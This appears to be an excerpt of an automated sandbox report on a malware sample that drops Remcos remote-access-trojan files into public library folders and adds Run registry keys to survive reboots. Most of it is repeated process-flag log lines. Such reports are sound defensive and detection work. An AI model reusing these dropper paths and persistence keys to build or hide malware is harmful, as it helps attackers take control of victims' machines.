              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile created: C:\Users\Public\Libraries\nmfsxfjX.pifJump to dropped file
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifFile created: C:\Users\user\AppData\Roaming\Remcos\remcos.exeJump to dropped file
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious names
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Creates multiple autostart registry keys
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XjfxsfmnJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_1_0041AA4A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XjfxsfmnJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XjfxsfmnJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D79B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02D79B94
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
